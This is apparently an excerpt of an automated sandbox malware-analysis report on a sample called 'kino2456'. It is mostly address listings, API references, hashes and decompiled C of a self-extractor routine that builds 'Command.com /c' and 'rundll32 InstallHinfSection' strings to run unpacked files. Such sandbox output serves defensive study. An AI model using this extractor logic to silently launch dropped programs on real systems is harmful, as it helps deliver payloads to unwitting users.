                                                                                                                                                                                                                                    0x00963f46
                                                                                                                                                                                                                                    0x00963f47
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963f47
                                                                                                                                                                                                                                    0x00963f1e
                                                                                                                                                                                                                                    0x00963f1f
                                                                                                                                                                                                                                    0x00963f25
                                                                                                                                                                                                                                    0x00963f26
                                                                                                                                                                                                                                    0x00963f2a
                                                                                                                                                                                                                                    0x00963f2d
                                                                                                                                                                                                                                    0x00963fd9
                                                                                                                                                                                                                                    0x00963fd9
                                                                                                                                                                                                                                    0x00963fda
                                                                                                                                                                                                                                    0x00963fda
                                                                                                                                                                                                                                    0x00963fe1
                                                                                                                                                                                                                                    0x00963fe3
                                                                                                                                                                                                                                    0x00963fe3
                                                                                                                                                                                                                                    0x00963fe8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963fe8
                                                                                                                                                                                                                                    0x00963f33
                                                                                                                                                                                                                                    0x00963f37
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963f37
                                                                                                                                                                                                                                    0x00963dee
                                                                                                                                                                                                                                    0x00963dee
                                                                                                                                                                                                                                    0x00963df5
                                                                                                                                                                                                                                    0x00963fad
                                                                                                                                                                                                                                    0x00963fb9
                                                                                                                                                                                                                                    0x00963fc2
                                                                                                                                                                                                                                    0x00963fc8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963fc8
                                                                                                                                                                                                                                    0x00963dfb
                                                                                                                                                                                                                                    0x00963dfd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963e03
                                                                                                                                                                                                                                    0x00963e0a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963e15
                                                                                                                                                                                                                                    0x00963e17
                                                                                                                                                                                                                                    0x00963e19
                                                                                                                                                                                                                                    0x00963f94
                                                                                                                                                                                                                                    0x00963fa4
                                                                                                                                                                                                                                    0x00963f7c
                                                                                                                                                                                                                                    0x00963f80
                                                                                                                                                                                                                                    0x00963f8b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963f8b
                                                                                                                                                                                                                                    0x00963e2c
                                                                                                                                                                                                                                    0x00963e30
                                                                                                                                                                                                                                    0x00963e34
                                                                                                                                                                                                                                    0x00963e36
                                                                                                                                                                                                                                    0x00963f69
                                                                                                                                                                                                                                    0x00963f6e
                                                                                                                                                                                                                                    0x00963f70
                                                                                                                                                                                                                                    0x00963f76
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963f76
                                                                                                                                                                                                                                    0x00963e3c
                                                                                                                                                                                                                                    0x00963e43
                                                                                                                                                                                                                                    0x00963e47
                                                                                                                                                                                                                                    0x00963e52
                                                                                                                                                                                                                                    0x00963e56
                                                                                                                                                                                                                                    0x00963e5c
                                                                                                                                                                                                                                    0x00963e61
                                                                                                                                                                                                                                    0x00963e68
                                                                                                                                                                                                                                    0x00963e70
                                                                                                                                                                                                                                    0x00963e74
                                                                                                                                                                                                                                    0x00963e7c
                                                                                                                                                                                                                                    0x00963e80
                                                                                                                                                                                                                                    0x00963e82
                                                                                                                                                                                                                                    0x00963e82
                                                                                                                                                                                                                                    0x00963e87
                                                                                                                                                                                                                                    0x00963e87
                                                                                                                                                                                                                                    0x00963e8b
                                                                                                                                                                                                                                    0x00963e91
                                                                                                                                                                                                                                    0x00963e94
                                                                                                                                                                                                                                    0x00963e96
                                                                                                                                                                                                                                    0x00963e96
                                                                                                                                                                                                                                    0x00963e9b
                                                                                                                                                                                                                                    0x00963e9b
                                                                                                                                                                                                                                    0x00963e9f
                                                                                                                                                                                                                                    0x00963ea2
                                                                                                                                                                                                                                    0x00963ea4
                                                                                                                                                                                                                                    0x00963ea4
                                                                                                                                                                                                                                    0x00963ea9
                                                                                                                                                                                                                                    0x00963ea9
                                                                                                                                                                                                                                    0x00963ead
                                                                                                                                                                                                                                    0x00963eb3
                                                                                                                                                                                                                                    0x00963eb6
                                                                                                                                                                                                                                    0x00963eb8
                                                                                                                                                                                                                                    0x00963eb8
                                                                                                                                                                                                                                    0x00963ebd
                                                                                                                                                                                                                                    0x00963ebd
                                                                                                                                                                                                                                    0x00963ec1
                                                                                                                                                                                                                                    0x00963ec3
                                                                                                                                                                                                                                    0x00963ec5
                                                                                                                                                                                                                                    0x00963ec5
                                                                                                                                                                                                                                    0x00963eca
                                                                                                                                                                                                                                    0x00963eca
                                                                                                                                                                                                                                    0x00963ece
                                                                                                                                                                                                                                    0x00963ed5
                                                                                                                                                                                                                                    0x00963ed9
                                                                                                                                                                                                                                    0x00963ee0
                                                                                                                                                                                                                                    0x00963ee6
                                                                                                                                                                                                                                    0x00963eea
                                                                                                                                                                                                                                    0x00963eec
                                                                                                                                                                                                                                    0x00963eee
                                                                                                                                                                                                                                    0x00963ef3
                                                                                                                                                                                                                                    0x00963ef3
                                                                                                                                                                                                                                    0x00963ef5
                                                                                                                                                                                                                                    0x00963efa
                                                                                                                                                                                                                                    0x00963efb
                                                                                                                                                                                                                                    0x00963efd
                                                                                                                                                                                                                                    0x00963f40
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963eff
                                                                                                                                                                                                                                    0x00963eff
                                                                                                                                                                                                                                    0x00963f05
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963f05
                                                                                                                                                                                                                                    0x00963efd
                                                                                                                                                                                                                                    0x00963dc7
                                                                                                                                                                                                                                    0x00963dce
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963dd0
                                                                                                                                                                                                                                    0x00963dd7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963dd9
                                                                                                                                                                                                                                    0x00963ddb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963ddd
                                                                                                                                                                                                                                    0x00963de1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963de1
                                                                                                                                                                                                                                    0x00963d59
                                                                                                                                                                                                                                    0x00963d65
                                                                                                                                                                                                                                    0x00963d6a
                                                                                                                                                                                                                                    0x00963d6c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963d6e
                                                                                                                                                                                                                                    0x00963d75
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963d8f
                                                                                                                                                                                                                                    0x00963d96
                                                                                                                                                                                                                                    0x00963d98
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963d98
                                                                                                                                                                                                                                    0x00963c8f
                                                                                                                                                                                                                                    0x00963c98
                                                                                                                                                                                                                                    0x00963cf1
                                                                                                                                                                                                                                    0x00963cf3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963cfe
                                                                                                                                                                                                                                    0x00963d11
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963d11
                                                                                                                                                                                                                                    0x00963c9c
                                                                                                                                                                                                                                    0x00963ca5
                                                                                                                                                                                                                                    0x00963ca7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963cad
                                                                                                                                                                                                                                    0x00963cb2
                                                                                                                                                                                                                                    0x00963cb7
                                                                                                                                                                                                                                    0x00963cc5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963ce8
                                                                                                                                                                                                                                    0x00963cec
                                                                                                                                                                                                                                    0x00963ced
                                                                                                                                                                                                                                    0x00963ced
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963ce8
                                                                                                                                                                                                                                    0x00963c9e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963c9e
                                                                                                                                                                                                                                    0x00963c56
                                                                                                                                                                                                                                    0x00963d35
                                                                                                                                                                                                                                    0x00963d35
                                                                                                                                                                                                                                    0x00963d3c
                                                                                                                                                                                                                                    0x00963d48
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963d48
                                                                                                                                                                                                                                    0x00963c03
                                                                                                                                                                                                                                    0x00963be2
                                                                                                                                                                                                                                    0x00963be7
                                                                                                                                                                                                                                    0x00963bee
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00963C11
                                                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00963CDC
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009646A0
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: SizeofResource.KERNEL32(00000000,00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646A9
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009646C3
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: LoadResource.KERNEL32(00000000,00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646CC
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: LockResource.KERNEL32(00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646D3
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: memcpy_s.MSVCRT ref: 009646E5
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009646EF
                                                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00968C42), ref: 00963D8F
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00963E26
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00968C42), ref: 00963EFF
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,00968C42), ref: 00963F1F
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00968C42), ref: 00963F40
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,00968C42), ref: 00963F47
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00968C42), ref: 00963F76
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00968C42), ref: 00963F80
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00968C42), ref: 00963FC2
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                                                    • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$doza2
                                                                                                                                                                                                                                    • API String ID: 1032054927-4103600427
                                                                                                                                                                                                                                    • Opcode ID: ba83180e44ac5c767d0792f2985d4056bfc0fe7154a5266e39f3187bb638c51d
                                                                                                                                                                                                                                    • Instruction ID: d3e5485858fc969c5934d60fe70921061a485170675aee01163dbda4d782f5e4
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba83180e44ac5c767d0792f2985d4056bfc0fe7154a5266e39f3187bb638c51d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B8B122709183019FE730DF64C855B2B77E8EB85700F108A2EFA95D21D1DBB4CA40DBA2
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00961AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 141 961ae8-961b2c call 961680 144 961b2e-961b39 141->144 145 961b3b-961b40 141->145 146 961b46-961b61 call 961a84 144->146 145->146 149 961b63-961b65 146->149 150 961b9f-961bc2 call 961781 call 96658a 146->150 152 961b68-961b6d 149->152 157 961bc7-961bd3 call 9666c8 150->157 152->152 154 961b6f-961b74 152->154 154->150 156 961b76-961b7b 154->156 158 961b83-961b86 156->158 159 961b7d-961b81 156->159 165 961d73-961d7f call 9666c8 157->165 166 961bd9-961bf1 CompareStringA 157->166 158->150 162 961b88-961b8a 158->162 159->158 161 961b8c-961b9d call 961680 159->161 161->157 162->150 162->161 175 961d81-961d99 CompareStringA 165->175 176 961df8-961e09 LocalAlloc 165->176 166->165 168 961bf7-961c07 GetFileAttributesA 166->168 170 961d53-961d5e 168->170 171 961c0d-961c15 168->171 173 961d64-961d6e call 9644b9 170->173 171->170 174 961c1b-961c33 call 961a84 171->174 188 961e94-961ea4 call 966ce0 173->188 190 961c35-961c38 174->190 191 961c50-961c61 LocalAlloc 174->191 175->176 181 961d9b-961da2 175->181 178 961dd4-961ddf 176->178 179 961e0b-961e1b GetFileAttributesA 176->179 178->173 183 961e67-961e73 call 961680 179->183 184 961e1d-961e1f 179->184 186 961da5-961daa 181->186 194 961e78-961e84 call 962aac 183->194 184->183 189 961e21-961e3e call 961781 184->189 186->186 192 961dac-961db4 186->192 189->194 211 961e40-961e43 189->211 197 961c40-961c4b call 961a84 190->197 198 961c3a 190->198 191->178 193 961c67-961c72 191->193 199 961db7-961dbc 192->199 200 961c74 193->200 201 961c79-961cc0 GetPrivateProfileIntA GetPrivateProfileStringA 193->201 210 961e89-961e92 194->210 197->191 198->197 199->199 206 961dbe-961dd2 LocalAlloc 199->206 200->201 208 961cc2-961ccc 201->208 209 961cf8-961d07 201->209 206->178 207 961de1-961df3 call 96171e 206->207 207->210 213 961cd3-961cf3 call 961680 * 2 208->213 214 961cce 208->214 216 961d23 209->216 217 961d09-961d21 GetShortPathNameA 209->217 210->188 211->194 215 961e45-961e65 call 9616b3 * 2 211->215 213->210 214->213 215->194 221 961d28-961d2b 216->221 217->221 224 961d32-961d4e call 96171e 221->224 225 961d2d 221->225 224->210 225->224
                                                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                                                    			E00961AE8(long __ecx, CHAR** _a4, int* _a8) {
				signed int _v8;
				char _v268;
				char _v527;
				char _v528;
				char _v1552;
				CHAR* _v1556;
				int* _v1560;
				CHAR** _v1564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				CHAR* _t53;
				CHAR* _t54;
				char* _t57;
				char* _t58;
				CHAR* _t60;
				void* _t62;
				signed char _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				unsigned int _t85;
				CHAR* _t90;
				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0x968004; // 0xf4cc89a0
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E00961680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E00961A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E00961781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
					E0096658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E00961680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E009666C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E009666C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E00961680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E00961781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E009616B3( &_v1552, 0x400, " ");
										E009616B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E00962AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E0096171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E00961A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E00961A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E009644B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0x969120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x961140, _t156, 8,  &_v268) == 0) {
										 *0x969a34 =  *0x969a34 & 0xfffffffb;
										if( *0x969a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E0096171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0x969a34 =  *0x969a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E00961680(_t108, 0x104, _t155);
										_t140 = 0x200;
										E00961680(_t156, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1564 = _t156;
									L54:
									_pop(_t152);
									return E00966CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
								}
							}
						}
					}
				}
			}














































                                                                                                                                                                                                                                    0x00961af3
                                                                                                                                                                                                                                    0x00961afa
                                                                                                                                                                                                                                    0x00961b07
                                                                                                                                                                                                                                    0x00961b09
                                                                                                                                                                                                                                    0x00961b1a
                                                                                                                                                                                                                                    0x00961b20
                                                                                                                                                                                                                                    0x00961b2c
                                                                                                                                                                                                                                    0x00961b3b
                                                                                                                                                                                                                                    0x00961b40
                                                                                                                                                                                                                                    0x00961b2e
                                                                                                                                                                                                                                    0x00961b2e
                                                                                                                                                                                                                                    0x00961b33
                                                                                                                                                                                                                                    0x00961b33
                                                                                                                                                                                                                                    0x00961b46
                                                                                                                                                                                                                                    0x00961b4c
                                                                                                                                                                                                                                    0x00961b52
                                                                                                                                                                                                                                    0x00961b57
                                                                                                                                                                                                                                    0x00961b5d
                                                                                                                                                                                                                                    0x00961b61
                                                                                                                                                                                                                                    0x00961b9f
                                                                                                                                                                                                                                    0x00961b9f
                                                                                                                                                                                                                                    0x00961bb1
                                                                                                                                                                                                                                    0x00961bc2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00961b63
                                                                                                                                                                                                                                    0x00961b63
                                                                                                                                                                                                                                    0x00961b65
                                                                                                                                                                                                                                    0x00961b68
                                                                                                                                                                                                                                    0x00961b68
                                                                                                                                                                                                                                    0x00961b6a
                                                                                                                                                                                                                                    0x00961b6b
                                                                                                                                                                                                                                    0x00961b6f
                                                                                                                                                                                                                                    0x00961b74
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00961b76
                                                                                                                                                                                                                                    0x00961b7b
                                                                                                                                                                                                                                    0x00961b86
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00961b8c
                                                                                                                                                                                                                                    0x00961b8c
                                                                                                                                                                                                                                    0x00961b98
                                                                                                                                                                                                                                    0x00961bc7
                                                                                                                                                                                                                                    0x00961bc9
                                                                                                                                                                                                                                    0x00961bcc
                                                                                                                                                                                                                                    0x00961bd3
                                                                                                                                                                                                                                    0x00961d75
                                                                                                                                                                                                                                    0x00961d76
                                                                                                                                                                                                                                    0x00961d78
                                                                                                                                                                                                                                    0x00961d7f
                                                                                                                                                                                                                                    0x00961e05
                                                                                                                                                                                                                                    0x00961e09
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00961e12
                                                                                                                                                                                                                                    0x00961e1b
                                                                                                                                                                                                                                    0x00961e73
                                                                                                                                                                                                                                    0x00961e21
                                                                                                                                                                                                                                    0x00961e21
                                                                                                                                                                                                                                    0x00961e28
                                                                                                                                                                                                                                    0x00961e37
                                                                                                                                                                                                                                    0x00961e3e
                                                                                                                                                                                                                                    0x00961e52
                                                                                                                                                                                                                                    0x00961e60
                                                                                                                                                                                                                                    0x00961e60
                                                                                                                                                                                                                                    0x00961e3e
                                                                                                                                                                                                                                    0x00961e79
                                                                                                                                                                                                                                    0x00961e7b
                                                                                                                                                                                                                                    0x00961e84
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00961d9b
                                                                                                                                                                                                                                    0x00961d9b
                                                                                                                                                                                                                                    0x00961da0
                                                                                                                                                                                                                                    0x00961da2
                                                                                                                                                                                                                                    0x00961da5
                                                                                                                                                                                                                                    0x00961da5
                                                                                                                                                                                                                                    0x00961da7
                                                                                                                                                                                                                                    0x00961da8
                                                                                                                                                                                                                                    0x00961dac
                                                                                                                                                                                                                                    0x00961dae
                                                                                                                                                                                                                                    0x00961db4
                                                                                                                                                                                                                                    0x00961db7
                                                                                                                                                                                                                                    0x00961db7
                                                                                                                                                                                                                                    0x00961db9
                                                                                                                                                                                                                                    0x00961dba
                                                                                                                                                                                                                                    0x00961dbe
                                                                                                                                                                                                                                    0x00961dc3
                                                                                                                                                                                                                                    0x00961dce
                                                                                                                                                                                                                                    0x00961dd2
                                                                                                                                                                                                                                    0x00961deb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00961df0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00961dd2
                                                                                                                                                                                                                                    0x00961bf7
                                                                                                                                                                                                                                    0x00961bfe
                                                                                                                                                                                                                                    0x00961c07
                                                                                                                                                                                                                                    0x00961d55
                                                                                                                                                                                                                                    0x00961d5a
                                                                                                                                                                                                                                    0x00961d5b
                                                                                                                                                                                                                                    0x00961d5d
                                                                                                                                                                                                                                    0x00961d5e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00961c1b
                                                                                                                                                                                                                                    0x00961c1b
                                                                                                                                                                                                                                    0x00961c20
                                                                                                                                                                                                                                    0x00961c2c
                                                                                                                                                                                                                                    0x00961c33
                                                                                                                                                                                                                                    0x00961c38
                                                                                                                                                                                                                                    0x00961c3a
                                                                                                                                                                                                                                    0x00961c3a
                                                                                                                                                                                                                                    0x00961c40
                                                                                                                                                                                                                                    0x00961c4b
                                                                                                                                                                                                                                    0x00961c4b
                                                                                                                                                                                                                                    0x00961c5d
                                                                                                                                                                                                                                    0x00961c61
                                                                                                                                                                                                                                    0x00961dd4
                                                                                                                                                                                                                                    0x00961dd4
                                                                                                                                                                                                                                    0x00961dd6
                                                                                                                                                                                                                                    0x00961ddb
                                                                                                                                                                                                                                    0x00961ddc
                                                                                                                                                                                                                                    0x00961dde
                                                                                                                                                                                                                                    0x00961d64
                                                                                                                                                                                                                                    0x00961d64
                                                                                                                                                                                                                                    0x00961d67
                                                                                                                                                                                                                                    0x00961d6c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00961c67
                                                                                                                                                                                                                                    0x00961c67
                                                                                                                                                                                                                                    0x00961c6d
                                                                                                                                                                                                                                    0x00961c72
                                                                                                                                                                                                                                    0x00961c74
                                                                                                                                                                                                                                    0x00961c74
                                                                                                                                                                                                                                    0x00961c8e
                                                                                                                                                                                                                                    0x00961c99
                                                                                                                                                                                                                                    0x00961cc0
                                                                                                                                                                                                                                    0x00961cf8
                                                                                                                                                                                                                                    0x00961d07
                                                                                                                                                                                                                                    0x00961d23
                                                                                                                                                                                                                                    0x00961d09
                                                                                                                                                                                                                                    0x00961d14
                                                                                                                                                                                                                                    0x00961d1b
                                                                                                                                                                                                                                    0x00961d1b
                                                                                                                                                                                                                                    0x00961d2b
                                                                                                                                                                                                                                    0x00961d2d
                                                                                                                                                                                                                                    0x00961d2d
                                                                                                                                                                                                                                    0x00961d38
                                                                                                                                                                                                                                    0x00961d39
                                                                                                                                                                                                                                    0x00961d46
                                                                                                                                                                                                                                    0x00961cc2
                                                                                                                                                                                                                                    0x00961cc2
                                                                                                                                                                                                                                    0x00961ccc
                                                                                                                                                                                                                                    0x00961cce
                                                                                                                                                                                                                                    0x00961cce
                                                                                                                                                                                                                                    0x00961cdb
                                                                                                                                                                                                                                    0x00961ce6
                                                                                                                                                                                                                                    0x00961cee
                                                                                                                                                                                                                                    0x00961cee
                                                                                                                                                                                                                                    0x00961e89
                                                                                                                                                                                                                                    0x00961e91
                                                                                                                                                                                                                                    0x00961e92
                                                                                                                                                                                                                                    0x00961e94
                                                                                                                                                                                                                                    0x00961e97
                                                                                                                                                                                                                                    0x00961ea4
                                                                                                                                                                                                                                    0x00961ea4
                                                                                                                                                                                                                                    0x00961c61
                                                                                                                                                                                                                                    0x00961c07
                                                                                                                                                                                                                                    0x00961bd3
                                                                                                                                                                                                                                    0x00961b7b

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00961BE7
